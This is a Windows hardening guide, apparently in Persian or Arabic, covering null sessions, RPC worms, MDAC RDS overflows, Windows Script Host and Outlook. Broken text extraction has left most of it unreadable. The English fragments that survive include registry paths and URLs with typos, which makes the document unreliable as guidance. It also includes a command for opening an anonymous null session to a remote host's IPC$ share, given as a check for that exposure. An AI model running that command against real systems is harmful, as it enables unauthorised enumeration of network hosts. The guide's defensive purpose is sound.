0 < ,6 3 ) # ) - *1 6, ) 6) Z '?@ , +. / 7) Y ) )Y ?5F T @^ 6 Y $T G' 6 6% ' R4 S @ IE $O) 7 Y. a I . # R4S b l ' R4 S @ ^ Z F $0 6* , 63 -, < ( E ? 5F ) MIME \ ) ,6(E 0 $IE ) IE -, < SL , G 78 5/ ? $"), ) U ' ' & $ B . -,< SL e 'j 4 O) ) -, < S L " ? 2 $, < -, 6Patch TG'update 0 5 - Y Baseline Security Check Qualys Browser a I _O) 0 5 - Y $IE GX) P ) F &1 @ ,< B : )c &'( )$,% IE ) Y - Y ) 2 -,< - < R 4 S @ & IE 1 ) )- 5 I # B ! 0, Z 0, < 0 0, K5 ( N ) Z W L* - Y % H) S @^ ‰8 ;! F j< * - Y 5/5IE * ("c 6patch ?@ $ 6Service Pack + F Patch 2 3@ 0 5 SL ) ("c : & N 'X IE 0 i. %/ , ? #4) I $l ' 3 7 # " % 0, * P R4 *# IE ! 5E IE GX) ? ?@ a 5 TP Inetnet 6% bP & O* • Custom Level ? 5 T G') Security Tab & O* • 4" - Y Z T G'$ " n 9 " Options Tools ("c 2 0, a <( E %1 , $IE " F) (,! $ $-,< K Service Pack 2 3@ _†pp{pr] 6Patch ("c 0 5 - Y Explore 6 SP1 Internet a h @ " ? 2 6Patch ("c 4$ 0 K 9:; 678 F SB g W L3 2 $j< l ' * - Y IE6.0 * " # ' 5 % R4 S @ ^ 6* 6 &] P 785/ Q Zone. R4 S @ ^ n. 
$ActiveX Controls ) Scripting Active 6@)7 I l ' 6% 4" - ) ?,< Prompt for Allow paste operations via & $Scripting j * • Clipboard n 9 " ("c script TG' g I . W L3 5 Active Scripting 0_, 5 - Y $l ' % N4 - < # 2 4" 6 Download signed Active X Controls O) " Prompt O* ("c] 0 < ( E " ,G & O* $ • Download unsigned Active X Controls Initialize and script ActiveX Controls not Disable & O* • Disable & O* • marked as safe & $Microsoft j* • & $Microsoft VM j* • High safety for Java permissions High safety for Java permissions N 4) )F 6 B 4 i. F I ("c 0 across domains Access to data 0 TG' g Cross-site scripting 6" E O* $ & $ Miscellaneous j * P 785/ " G5 ^P • I 5 $sources &'( )$,% * #V ' Windows Remote Access Servies #P< ^ P )Y -, < K „ 1# 6% ^ 6 „ 1 # ) 7 # $"), ) 7) Y 4)7 # " -,< K 3 6 K ) : 2 0, 5 , 6V < ? `56 $_PRC] 62 ) E 3 ') #P < 6 BH ) 7 # 0 3 " ) 6 '2 < + 2 F + GX) , 5 ,H ) F ? & & 3)- 3 , " ) " g@ (, ! ) l '=GX ^ $? & 6 '? & # l '% < TP, " 7, F - ) 3" + V <S , 7 L ?5F b ?@ " ?# K % b <R V < ) CIFS File ) - " 4_ (E , b ?& ) K6 * _ - < ) F "), ) ) ,5 I ] 6h) ) ) 6 / 6 ! DY/ - Y " W L3 ) P Q M ,6 l '? 6% ' T $ #P< V < S ? , _ ) #P < , # 4 (, ! % 1 , B . # 4 (,! % 1 , 1 )- 3 7 / pqqw T " 2, ? & " - Y $ #P< V < i. 0, < S 7 B 5! ( E ?# $l ' 6%# ) 4 0,< CH ] 0, 5 F 7 # " % '" - Y Z - $, l '+ System Common Internet ) " 9:; U 2NETBIOS H #P< #P< ? & 7 B 5! " - 5 6 '$?@ P l '(& # (SMB Block Message Server)] %# ) 4 ( ,G 7 5F 0 ( " - Y ) 6 '& ^P K6 , 1' ) % 'V < ?# $"), ) % ! -, < <R V < 0 Logon NULL 6i ?A != ] ^P 6 ) - ) "), ) 4 6 3 $l ' 5/ ) K #P< 6%# ) 4 Q Anonymous $7 B F $NETBIOS #P< ) - " 6* 0, 5 0, 5 ("c % 4 $ #P < E 6@ ) 6 , 1' 3 ) 6 I] 6 ' #P< ? ) F + 2 < ) ?, 3 ?# $ < ( E #P< -, < <R V < + 0 ' ,6 3 j6 . " : 7, , " " 3 $ 3 ? #56 <R V < P , )- Y Z _ 6% ' #4 # 0 :3 ) Logon Anonymouse Null Session 85! $Session C P !& )( ] l89 $_ 13Null Session " 0 6U ) 0 - Y 6 ) "), )NT ? G $Local System account E n 9 " #P< ? 
G $bP 7 L 6 A R4 3 : l' 0, 5 Null Session H$ H ^P Local ,K $ P 1/ 6* 0 * ?# $ " %1 , 1 ), 5 5 6 ' KN* 4 Session Null pqqq "), ) 2 ) 6' I5 Z F u ? # $pqqq "), ) " % P H 6* , _ & 0 !"V $ 6 ? ! ${†"), )CE $NT $pqqq $ME ) XP B B & ) 6N , , # 4 $ &'( - P< 7 5 I H 0 ) - Y $? , 6 native A R 4Null Session ) 6 $? )Z F B . 0, 5 %# $ 6-) Z F computer account Local U ) H ) 6 'pqqq "), ) " % P H ] <+ I5 ) pqqqLocal System account ) # 3 7 !89 j 5 null Session "), ) 0, 5 6U ) 6U ) Computer " $, bP P! ?), -,< E 6 6, F) I5 ) ? @ ) 6 '? 5F ,6 3O * ^ , < -, 6" E 0, 5 b E !89 E - Y " $ P 75 I ) - " 23 , - 9*5 ) l ' GX) " - Y Z ? 7< RPC Remote Procedure Calls:_ " ] "), ) 6* " , GNT $pqqq $XP (& # " 9P I nter process Z F T/ ) - " ) N ?& 0 ' 7 F , 3 ' ) 3 - *1 , 0_ B . F \ " 785/ ( E 3 H F - Y ) ,G 785/ ? 0,< H F 2 Blaster/Msblast/Lovsan ) 6" E - 5 ] 0 Nachi/ Welchia " - Y 0, 5 H $? & $l ' R 4 S @ : " - Y ) - " ?& 6( 2 " _pqqs $ 0, - - Y l ' R4 S @ : " Dos R4 S @ ^ ! ^P $ RPC0 ( ). / 0, 0 1 !" H,, 2 e G !" bP : R4 S @ d * 7c #< d * I5 0 5 NAT 7 5B " 5 % 'V < U ) ?# F ? $l ' & - .NETBIOS T L. &'Afentis security 0,< A8 " %P H 7 !89 #B 5! - . " )@ +5F I 5 6@ 2 a 0, 5 $ -,< h PH NAT ("c NETBIOS $, L W L3 : ,G " ? NETBIOS - Y " Netbios Auditing Tool ( -,< K ) W L* ^ 6* 0 &'( )3 45 678 %K b "), ) 6 B / $ ) #) " ) (E - Y $% ' h @ " http:// www. Afentis. Com/resources/win32/nat - Y 0 5 " , v2.11 Legion N ${† ) {Š "), ) ? % 'V <Legion b " , -,< K Rhino9 #P< V < $pqqq "), )? Checker)Security Fridays Share ? , ) {† ${Š 6* ] "), )CE S @ d * 0, U) 4 * GX) 5 - Y I5 _ SPC)Password % 'V < ? # $l ' 2 3@ ] I5 0, 5 - Y _ R4Level password share "), ) ? ^P NT ? @ ) ] sp4 $pqqq $_,< -,< SL XP Baseline Security Advisor S @ ? & W L3 : R4SMB 0, 5 l '%# ) 0, 5 B . ? & "), ) ? ) ? 5 M 9 ? $pqqs ) ("c A & R3 )- Y ( ,H $ R4 S @ " - Y Share net , 5 -,6 €" ? " , 6 ) ( E ) - " ? & NT $pqqq $XP 0 $l ' <+ ^P 6' B5# 7 !89 " , pqqs ) 1$ b3 n 9 " ) 6@ ]Net Share/ $ 0_ 5 - Y 0 -, < K ' j $ <+ <+ T 5! 
) ^P 6( E ],< 7 !89 S a ‰8 - Y " 7c ) 7 < "), ) <+ W 3 <+ … )% ' ^ P $ : u !89 1 2 6( E " %P H$ F) 1 ) I 5 0_ < ( E " ? u 1/ + 6@C 8 <+ 7 ?, ("c 2 W L3 L 7 u u $-,6 $ I - .… : " ) - 3•… 3 6" E MR / P !& DY/ ) -,< - ) 6 ,1'XP "), ) < ,1' V < ? 5 TG' g - .… "), )XP V < "), ) a 6" E 6* , N ) 6% ' " 6 - .…NTFS <+ ^P e 'j 4 6" E "), )…NT "), ) ) pqqq "), ) $XP S L " % P H ] SP1 " E $_ "7 L Everyone 7 L ) Control Full0, < "), )…XP ? @ ) SP1 " E -, < SL Everyone ) $ 7 L Read0,< "), )…xp ( e 'j 4 7 L Sharedocs < User s/ Documents and settings/All C: /Documents " E ] _ Everyone 7 L ) Full Control0,< d * H + Open Share " GX) I5 + " ? "), ) GX) # 0_, < I5 $ F 5 ?N ) 25 $?N SMB 6* 5 6 <+ ^P R4 S @ ^ - Y % H ?@ : d * 3 ], < File Sharing %K ^ Gibson Research Corporation " ? & " 6 N 4 SB g bP 2 I5 ) R4 S @ 0 5 ' j 4 6& a 5 - Y …Nessus0 ) - " - Y I5 - ) -,< ( N $?N j 4 & a …Winfingerprint N 4 aWin32 Host/Network Enumeration E% !E " : 0 &E '( E)3 4E 5 67E 8 Logon Anonymouse >E " I 5 KD) `R Anonymouse Logon R4 S @ null Session0 K5 TG'$ b3 n 9 " ) " $ " - Y From Command Line Prompt: C:/>net use// ipaddress/ipc$""/user:"" < +P TL ? G ) -,<anonymouse P ! & Null $l ' -, < 'N I System error 5 F " U4 # ' F Ipaddress d * ?@ ( ] user/:” )_ hidden interprocess communications E ] H $l ' R 4 S @ : e G & @ IPC$ E ;! $l ' P 4 $l ' )- F) (, ! -, 6, 2 (E F " U4 # $ 0_ n. I 5 ("c " E 0 < ,6 * =GX 2 % R 4 S @ -, 6, ]% P Hj * -, < 'G Winfingerpirnt d * 6 &'( 6 j 5 .Y " 0 ) Nessus ) , 63 & _Null Session0 5 - Y $ I5 ? $0 !E "V $E E $ <- ? !E E% !E " 0 &E '( E )3 4E 5 67E 8 NT NTRK)(Resource ( regdump. K F % ' % <$ ' ) # n 9" "), ) ? & NT h @" ? E % & b3 ] $ B 3 F #P< ) 6& K<@ Secutity Analyzer I 5 A) 2 h @ n 9" ? l' >" Microsoft Baseline $l ' 0 2Q7E " - Y 0 - K $ R4 S @ d * http://www. Microsoft. Com/technet/security/tools/Tools/MBSAhom. Asp0 5 &'( ) % ' 9:; 678 DY/ - .NETBIOSa bP 785/ % - Y ^ I5 $ 6 Patch-cheking , hotfix ( 2 - ) pqqq $NT ) 0 &'( )3 45 678 RPC ' ) # !" : XP % -)8! 0, 5 http://www. 
Afentis. Com/top20 0 5 - Y & _ % H$ 6" E TG' g 7 L I "), ) ? & $l ' & n 9" h 7 , , j6 I5 ,G 6 #6 " ? : 2 a 5 5 ?@ " - Y ) X # sharing ? 5 T G' g 0,< CE ) {† ${Š "), ) ? , * ? G User-Level share access control 7 U) 4 L $, < NT "), ) Dmain " 0, 6% 'V < 0 0 ) FTP n 9 " ? # $sharing " - Y C ' ,6 3 sharing $S ?@ N n 9 " b' -,< <R V < &1 P !& z 0, K5 , 1' 6 , 1'? ? & 7 ) X7 2 , 0, 6 ( E " E ) -,< , K ? 0 #4 sharing ? 5 T G' g ) HTTP R4 7 + $S ? & , $ < +P " - Y I5 Sharing ), . C ' $7 ) X 7 )(E ,1' : 0 <R V < h @ sharing ?# ? ),. 0_,< ("c R 1$ ?@ " $ E < $ DNS F) , -, < K u S X j &' I 5 E u a 5 - Y " : : 2 6 !89 $ 1 2 6T 5! " % PHBackup 7 " ?# $7 ) X Restore " ? ] ,E ?# ] 0 5 ip # -, < ' 0,< < F) ? @ _ !89 + "), ) NT "), ) F ? 5 Restore ) $j F i ) $ Backup - . 4.0 F ? 5 Restore ) j ) $ Backup - . F ? 5 Restore ) j ) $ Backup - . pqqq "), ) ) XP "), ) pqqs "), ) "), ) 7 L , " Null sessions " # & K6 2 NT Domain Controllers $, -, < , 0 Windows NT Domain pqqq "), ) " % P H 6* ,63 3" 7 9P #4 I5 pqqs|pqqq "), ) ?# ] -,< Z F P ) 1/ b 2#5 I !89 ?& ? ,< < F) I 2 F Restrict Anonymouse 9 $ pqqq "), ) 6 $ • " - Y $_ , 5 5 1 ) j6 6% 4) 6 # h ), . T 5! a 5 - Y " 7c " 5 $ , I5 0 MR / ,6 3 ) 7 !89 R3 null session " ? : $ ! 5E Anonymouse ? "), ) - Y ?5F T@ -, % / - 0, - Y pqqsRestrict Anonymouse , $ 6 ' 7 !89 K ),. T5! NT Restrict Anonymouse "), ) F , " - Y - . pqqq F a 5 - Y " , Restrict Anonymouse 2 #< ;! F Domain 0 6, B "), ) ? % bP 0, DY/ - . 6" E ) $Service Pack 3 E $l ', , " ()&17 SL " u : E u ] ,E " ?# $7 ) X 7 " ) 7 $ " ? -,<restore : ) E -,<Backup ("c R1$ 0, < < 2 "), ) I5 / )NT 4.0 E 0, < 2t5: $ 6T5! " %PH !89 + 3 u( E " %P H 3 !89 $ 1 2 ?@ " $ a 5 - Y 2#5 Trust pqqq "), ) E K I 5 Restrict Anonymouse 1 " ? , $ K " T#< E i NT 4.0 "), ) E ? 5 Resroe ) $j ) $ Backup - . pqqq "), ) E•? 5 Restore ) j ) $ Backup - . " ' F) ? @ _ ) XP "), ) E ? 5 Restore ) j ) $ Backup - . pqqs "), ) n 9" a K5 E TP ), . T 5! E ,B E I5 I 5 a #P< " %/ ), . 
$ #P< create the following Registry key HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control Secure PipeServers\winreg Description:REG_SZ Value:Registry server - " " F) K 6) j 4 7 5 I $"), ) SL ? " 0, 5 $l ', B e 'Access Control List ] , 6) " %/ $ a K5 )? d* 3 $l ', B ,< B E ),. T5! E 6" E ) 7 " , Backup Operators ) 6" E ) Regedit32.exe ] I5 , B E E F a, B 2 ' F E F HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Control Edit n 9 " Add Key a " Enter the following values: Key Name: Secure PipeServers Class: REG_SZ a, B 2 ' F E F - H _ pqqq "), ) TP _ regedit.exe ) & O* z 0,6 HKEY_LOCAL_MACHINE\SYSTEM\Current controlSet\Control\Secure PipeServers Edit n 9 " Add Key & O* a " z Enter the following values: Key Name: winreg Class: REG_SZ a,B 2 ' F E F HKEY_LPCAL_MACHINE\SYSTEM\Current ControlSet\Control\SecureServers\winreg Edit n 9 " Add Key & O* a " z Enter the following valuses: Value Name: Description Data Type: REG_SZ String: registry server a, B 2 ' F E F HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet \Control\SecurePipeServers\winreg 0 Permissions " E Z :! ) Security ) B $ winreg O * I5 " E )? 6-) ? 1/ 2 0 5 'X ( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor 0, K5 ", - E " $-,< F) 0 5 E # 1 u ,LH -,< - < B / 2 3@ ? ^P I "E ? ) i $,< < ), . T 5! a-,< , K ) - " 6U ) : " ("c 6" E " 3 i: ? , B ? @? 5 d* AllowedPaths ^ ] 5 = Machine G 2 $ 0,< E < TP, $ account name U ) 1 Z F T/ winreg T5! (,! ,B ),. T5! P F7 [ , Directory Replicator ) service printer Spooler : ? )&' # ^ I 5 "), ) , # 4 3 6, B )$ ), . 
) Users a_ Bypass the access restriction: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\ SecurePipeServers\winreg\Allowedpaths Value: Machine Value Type: REG_MULTI_SZ - Multi string Default Data: system\CurrentControlSet\Control\productOptionsSystem\ CurrentControlSet\Control\print\print\printersSystem\CurrentCont rolSet\ Services\Event logSo ftware\Microsoft\windows NT\Current V ersionSystem\ Current Contro lSet\Services\Replicator Valid Range: (A valid path to a location in the registry) Description: Allow machines access to listed locations in the Registry provided that no explicit access restrictions exist for that location. Value: Users Value type: REG_MULTI_SZ Default - Multi string Data: Vaild Range: (A valid (none) path to a location in the registry) Description: Allow users access to listed locations in The registry provided that no explicit access restrictions exist for that location. DY/ - .RPC bP %K % SL : 2 A) 2 Windows Update ? 5 TG' g #B 5! ^ P Patch b I ,G ), . T 5! 6MBSA -, < K 6A) : )RPC h @ " - Y http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y , - . : ),. T5! #B 5!RPC 2 U4 ) (E # ?# Patch B 5! $ "), ) U ) g 0 5 T 5! bP ) ? 5 TG' g " 3 I B 67 7 ) 4 ? ' <, 0 F) 2 # 2 " ;! , u, ? @ $ #B 5! . $, < ,< : - < 3 2 F) ) $ 4 " ? 59 " ? 5 RPC ^ ^ Š{s ) ‹‹Š ) ws{ ) wsŠ ‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8 ) "), ) $ R4 S @ : a 5 - Y 67 " : !89 + E 4 ] "), )TCP 67 4) _ ),. T5! - . K<@ I -, < - <Windows remote Access Servivces " ? Security Bulletin Service & Hotfix Microsofts editor windows server 2003 Registry) XP "), ) " - Y - . access: Remotely accessible registry paths and subpaths Network Server 2003 Security Guide windows &'( )$,% *#5= Microsoft Data Acces Components (MDAC) MDAC S @^ !89 " - Y R4 MDAC ?5F bP 0 " , -,< ' ) 6, " $l '785/ 0, 5 - Y _O * 7 a 5 - < "2 E B % !) " H # $"), ) : ? ! E % <$ 3 2 6* " ,G ,G 785/ ? ), Z F] 6 # ) " - Y RDS I ] 5 ,H 6 „1# " 3 M ,6 1 ) ,< < F $ R4 S @ ,G % c , -,< K 7c L. 
, ,F %K F) ) _ overflow buffer - 9 *5 F 5 $ 0 ", RDS 7 5B " MDAC $ " S Remote Data Services 5 , H * H ) - " ? 0, 5 Z F $ , 7" $ =GX ) 6" E - 5 78# ) 6=GX 0_ ?@ B F * ] s) Š MS Access !89 6 GX) 2 3@ 6 T 3" 6 R4 S @ $_ 6 ' ,G 7, , " j ) -,< 3 < % 5 ,H R4 S @ B % c " $ 6 0,< Microsoft jet " ) j &' ] I 5 ("c 7 , )- B . 7 L =GX - 5 l '=GX Microsoft jet Database Database Engine " -, < h PH 6 F) 0 S : $l ' -,< K ) , # 4 (,! )- # (N F ) 6, " 0, -, ! 785/ l '=GX " - Y 3 785/ " # Buffer Oveflow ? ?5F (E %1 , $ : - 5< MDAC0,< P 3]21 MSO3-033 * _ 5 R4 S @ : 2 0 MDAC -, < - < ?@ $pqqs "), ) ' ) # +. / "), ) IIS !" Q NT 6 ) T)J) $ RDS ) j< l' 6* =GX SQL " MDAC 0, < 6* ] SP2$_ Q$ < l ' R4 S @ : !" ‹) q $,< -,< SL w)Š ) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ ) * SQL Server 7 ? @ ) ?@ ) , 56SPI $_ K6 -, < SL , G ) Server 2000 -,6 N 560, 5 - Y "), ) 0 &'( )3 45 678 "), ) ) % ' F) W L3 NT 4.0 - 5 IIS SL # ) * $,< -,< masdcs. Dll” % '] < ( E ("c C 5! l 'files\Common files\System\msadc\msacds.dll c:\program h @ # 0_, < 7) Y ) " , #4 F 2#5 l 'h @ $ patching 2 ( N $,< l '% '% < I % ! 6 ) 5 ,H 7 K &F " 6 @ 6 &'( F) 7 I5 0 < , 6 3 0 H$ : $ (E ? HS @),, e G $-,< - < ("c 3 " ? ( : W (N W L3 MDAC- 5< R4 S @ ^ 2 ("c ( ,H F b < S $l '? # 0 5 - Y $ 0 5 ,6 3 6 &'( " &'( )$,% % 6=GX ' ) # Windows update 0 5 - Y L3 : )(E 0 -,< i 3 I5 & R4 S @d * 2< ) -, < SL 6 &' 9:; 678 RDS $Jet " ? ? @ h @http://www.wiretrip.net/rfp/txt/rfp9907.txt & DY/) MS03-033 21 " ? - .?@ R4 S @ : 2 % _ B ) i.L - . ) ' ) # P 3]2 1 2, 0 5 - Y : 2 http://support .microsoft. come/support/kb/articles/q184/3/72.asp http://www.microsoft.com/technet/security/bulletin/ms99-004.asp http://www.microsoft.com/technet/security/bulletin/ms99-025.asp http://www.microsoft.com/security_bulletins/ms03-033.asp http://www.microsoft.com/technet/treeview/default.asp?url=/technet /security/bulletin/MS03-033.asp http://support.microsoft.com/default,aspx?scid= kb;en-us;82378 ? ver * $l ' 2 3@ 0 =GX 3 $†$p MDAC Z I MDAC * !89 6 F MDAC bP ! ) h @ n 9" ? 
http://msdn.microsoft.com/library/default.asp?url=download/list/dat aaccess.asp " ? 0 5 : 2 0 5 ' ) -,6 windows update - Y & &'( )$,% *#!:1 Scripting Host(WSH Windows) WSH ) 4 # ) #B 5! j &' I 5 6* „ 1 # 0_ - - 5 6, " - Y N 4 -, , 6 # U l ' 6% $"), ) 4] , 5 -,<desktop 0_ 5/ ) K f4 * F $% ' I ], „1# $ K "), ) % !VSH ?# $ ?@ " g@], F -,< K ? G ) K "), ) 7 B 5! ? n 9" C 5 , - 56{† "), ) b "), )VBScript P 21 ) ) ) F " $l ' „ 1 # 0,< ? - 5 IE ') # Z F 4 6' 4 # ) - ? 5 ,B ) n 9" ) 4 # % ' 0_ # ) #1 ZF -,< < VBScrip 0, b " 3O * M 6 7 % % '\ vbs,. Vbe,js, .jse0) 0wsf 6 '$ +. / ) # - 56 ) ) WSH K 3 B ;! I 5 $, , & WSH O G 0 ) X ! B % !$ ILOVEYOU , ] J)WSH( ‰ : " U4 6 0_ # ) #1 - 56 4 -, 2 , 0, - 5 - Y ? G $jscript ) Z F U) ') # 6" E n 9" -,< K ? ! ?@ " g@ ] , E $% ' b „1# $ 6VBScript 2 1 ) ) "), ) , - 56{† "), ) N I ], ) l '( i: #B 5! j &' I P IE * WSH _ !" ) - # <R ? 1 K6( F ?# $S T)J) ) F " $l ' „ 1 # 0, < „ 1 # 0_ - 5/ ) K f4 * K "), ) % ! $"), ) ) # 6 4 ?# $ - 6, " - Y ZF J)WSh ( ) X ! B % ! $ILOVEYOU ] -,< < , VBScript 7 b M ,6 % I 0, , 3 c ‰ : ?@ " U 4 3 O * WSH % '\ & " 6 wsf.vbs,.vbe,js,jse OG 0 6 '$ ) +. / "), )NT "), ) 2 3@ <R ? 1 K6( F ? # $S ) i: - TJ) ) l '( _ 0, 2 , 0, - 5 - Y # ? ! Jscript 6" E 0 1 !" WSH n 9 " * B ;! ) 7 $IE ) , $_, G f4 * ] SL {Š ) ME,98,98SE,2000,XP ) WSH,2003 0 ' 0 Windows Scrpt SL e 'j 4 7 h @ " ? Windows Download Script0 5 - Y !" 0 &'( )3 45 678 -,< SL IE5.5 * - 56 NT ) {Š "), ) ? @ ) K6 • 0 -,< SL pqqs ) XP $ME ${† "), ) ? @ ) 0 WSH # W L3 0 $, <P -, < T ("c ("c : K6 WSH A) " - Y DY/ I : 2 ?@ K6 ' ) SL 0 < ,6 3 )(E #6 • ) HS @e G -,< SL ? @ ) " $,< ,6 3 - < ? @ ,G j* K6 - Y $?@ % &'( )$,% $ % 9:; 678 , 7 B 5! ) 6 " - Y , " WSH 0,< , 6 3 F T#< 3 $l '% l' 6 D 7# / FWSH - < # 2 4 MR/ ) ? 5 TG' g 7 ("c , )- „ 1 # WSH ? 59 T G' g ? ) MR / $ 6 bP %K )- ) " ,G ) 785/ % WSH 5 " ) ?@ "), ) % ! ?@ DY/ #B 5! 
" I # 3 3 * $ N ?), ) $ ] 40 5 TG' g l '% 4$ 0_,< Noscript.exe b 8 $ WSH 6h8 % '( Wscript.exe ) Cscript.exe 6, BShell\Open2\ Command E 6 6 ^ -,< K $ Sysmantec U ) # 5 SL F W L3 I ("c ) Shell/Open/Command $ N 4 $S 0, < , 6 3 ( E $? @ Noscript.exea K5 TP Y 2 , 0, 5 ) P Q M , 6 " I' " Noscript.exe $ Norton Script Disabler/Enabler ) TG'] WSH GX) 2 3@ Z F " U 4• F 6A" OG L3 ("c 4Desktop K6% '] # wsf0.vbs,vbe,js,jse, $ OG 6% '] - ?# ? 6 -, < ( E # $-, < < N 4) , I j 5 j 5 6% ' ^ P 6% ' "), ) e 'j 4 , #4)75I 2 . F , ) "), ) e 'j 4 6% ' u 3 " ? 59 " U 4 , '? - .0 EXE u_ ) COM ) _ 0, < , 6 3 Z F ? @ B '8 ("c ? 59 0 5 6 '$" E F% # WSH ( E ) 7 , , ? 5 m .1 FWSH ?,< TG'(,! W L3 # 6 - 6 '?@ ? 5 TG' g DY/ $ 5 %K "), ) K F ) / % '?, < T G'" U 4 ,6 3 - _ < bWSH a ' ! #B 5! W • ' ] Noscript 0 . T G' g " %/ Symantec ) T G'? # $_TG' g u I ? g MR/ 6 # % '$ # $S 2, 0,< K6 # 0 -, < T "E ? 0 5 d* 0, 5 •* T /2 ! ) ), . $, # WSH ? 6 6 ! $2 ?@ F W L3 ("c 5L S @), , G I 2, 0 < , 6 3 @? ! Z F ?# ? `56$ ) / % '( csript.exe # 0 wscript.exe )= G Cscript.exe myscript.vbs ? 5 TG' g ) MR/ - . : 7 !89 S WSH I h @" ? http//www.symantec.com/avcenter/venc/data/win.script.hosting.html 0 5 - Y 1c ?!) -, < ( N U ) ) ? 5 TG' g ^P I 3 $l ' 6 &'( O * 6% ' I ] 0 6 # ( E WSH0, 5 b -, < K 6( $S 6% ) / K5 X , < .scr.vbs,js,jse, wsf,bat, Script Blocking 4gatways U ) SL $? & ) ? , 6 WSH ? -)8! ] ("c @ $ 2, _ 4" - Y # ) #1 6 ) 6h ) )exe pif and 8Q _Norton AntiVirus 2001 ? # $, G C P 6h) ) % ? & , K DY/ d @ _$!"1^ 77 0 WSH " ? UW + ?@ * 2 3@ 0 h @Windows Script Download0 5 'Z 7 G', $ 3 ? 1 ' 0 1 7V NTFS 6" E " NTFS h wscript.exe ) jscript.exe % H ? i: = G " K6-) )? I ? ^P 9 - 56account V < % ' ) # % ' ) " 0 5 - Y $"), ) PG e 'j 4 7 5 I $ < 6% ') 6 Full Control -) $‰8 W L3 l 'e ) Everyone $, < ? ? 5 $S 2, 0 < ("c " E 'j 4 7 5 I 0, < $ 6 0, , + : uNTFS 6" E TP 5 % < ' I 25 0, < 5 S K6-) )? 
) X " %/ $ ) 6% 'MR / ) T wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' " I <R V < <R NTFS e 'j 4 7 5 I $ < 7 6 % ' ) ^P a K5 25 , LH B' ) O * $My Computer ? 5 TG'• $ 0,< _% '$ $ u , LH ] -,< O * 0 K5 d* 9 -) $?, 3] " E L3 Y. O* tab 7 (,! Deny ) ?# Allow % ' Property $ ?& % ,P % ' I ) $ NTFS convert drive_letter:/fs:ntfs 6" E NTFSah @ " ? bP \ $Pemission j* 0, 5 # Security j * F) ?@ ) ^P .Y F) ?@ " Property Y. ? 5 TG'• < ^ Account $d I < 5 -,6 " ? I - . W L3 % ' ) d* 6" E • & 0 K5 _000 ) 2 < Security $% ' ^ NTFS 0 • -, , #4 $ Convert ] 0 5 - Y 7 !89 S I5 $ http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp sc.htm 0 5 - Y &'( )$,% *#!51 Outlook Express, Outlook Microsoft Outlook 7 !89 $l ' 0 ') # $ 6h 5 b $_U '@ -,< K , ?# $ # ) #1 ^P 7 0, 5 Exchange ) K 4" K $ K6 0, < "2 -, < K 0_ - ? &56 ‰: Outlook98 y SL 7 P # ) #1 0 I 5 6 BH ) - $ F !" V 8Q 0, < , 6 3 C A 0 ' ,6 3 3W 3 6% 4 H I W L3 ) ?N IE ^ - Y F 6* %/ - " 6 J) 0 - ,E - Y 9 ) U '@$ , ) T) , ) 1 ) < ,6 3 TP N P ?@ 6 - Y * ?), ] $: , " T#< ") =GX [ 7 F) 7 G ) - ), . ?@ " - Y Z ") B 5! b. , N : <2 C G:H 6j1 $2t5: ) 25 S * " - Y 0, < , 6 3 6 '& F =GX $W 3 L ! I $ 6 &'( SL ?# _ c $l ' # ) 3 $ ) rendenring 0, 5 6 ) H ? 5F * ?@ - 56 , 1 6 '$( '784 2 , G 7c L. ! ] 56${Š "), ) 'G ? " " ] ' ) # Outlook 98 IE - Y a? `56 P Q 4 -, 6 U ) =! > ?@ SL ? ! 4 " HTML 2 -)8! Server V < ? " $7 H8 IE - Yc j* 5 ? ! ) L*< 1 ) 7 ,3 K Backoffice „ 1 # " - Y ? # $"), ) % ! $ U) *] 6 c L. n YBIE ) OE I 4 -, 5/ 0 ) Express Outlook ] _OE Outlook K ! 5E " ? " ) 6 1G'Oulook " 4 l), F # ) #1 bP b 2, 5 $ 6 &'( 4 6 '& $_ ' ) # ("c 78 % , - 4$ ') # BH M ,6 " # 0 < ,6 3 T # ) #1 6 ) 7 !89 , , \X 2 )- $ # ) #1 6 0,< < TP O * &'( P 6h) ) " 6@ I n 9 " Help l' f4 " Outlook ? ! Z 0 , :3 ) 7 , , ") # ) #1 6 -, " * 2K4 0 ' 6 @ 6* 6N F e 'j 4 SL ] 0 ,G - 5< " ? ?) ' 6 BH 3" $IE ) F " U4 $IE TG' $ >! ? ! ) ,< ,6 * SL Outlooka U) l ' &'( 6 K U '@- $?@ SL W L 3 _ -,< K "), )OE 0 B '8 0, < - 6T / " 5 - 56 -,< K & ? 5 About , ,F * -,< E 0 1 !" 
6* * G 6, ) 6( +. / OE e ) !89 6) $ , $ ,F ) 7 5L 6* Outlook9 • Outlook97 • _ < Y & Outlook9 ?@ ] Outlook 2000 • ) Outlook10 ?@ ] OutlookXP • Y & Outlook2002 _ < & ? 5 TG' About * - 5< " ? OE 2K4 ! pqqq " a 5 - Y n 9 " Help " 6* Patch + 0 ' 6@$ " ? !89 -http//www.microsoft.com/windows/oe/. -http//www.microsoft.com/office/ outlook./ !" 0 &'( )3 45 678 F " U4 ] IE : ) 2 _ -,< SL 0, (N ) ) SL "), ) % ! 6 ?@ - 56 Outlook Express " * IE $U '@ 6 SL * " ,6 3 ,< ! 5E SL " - Y ( ,H ? Outlook -, < K ( N (,! 7 0, < H, , e G ?@ ) K6 0 -,< SL & 0 < ,6 3 HS @e G 0 5 OE )Outlook 6* 3W 3 $ 9 5 %K 75 I & A ! (,! # ) -,< SL 0 < &'( )$,% % "2 a (E F 7 , , j6 ) l ' R4 S @ % DY/ I 5 YB* 7 B 5! *# Outlook 0 6 " Outlokk Express e 'j 4 7 5 I ) SL Outlook ) Outlook Express 7 5 I W L3 4 9:; 678 ("c W L3 2 0, : 2 0 =GX 2t 5: -,< SL * ? (N " ) (E a SL ) http//windowsupdate.microsoft.com/ . ] Critecal C L 3 -,< K _ n 9 " Layout 0 6 , & O* 0_Preview] 6 'Show Preview Pene bP " 5 Security Zone] ) O * Options & ? 5 TG' g n 9" a,< : I " View 5#. 2 • 0 # ) #1 High I Ae 7 ) $7 !89 " 6 5 1 ) % 4 ? 5 T G' g • 0 < ' D 6Patch / 7 5I ? 5 & Tools - Y • ) A" @ 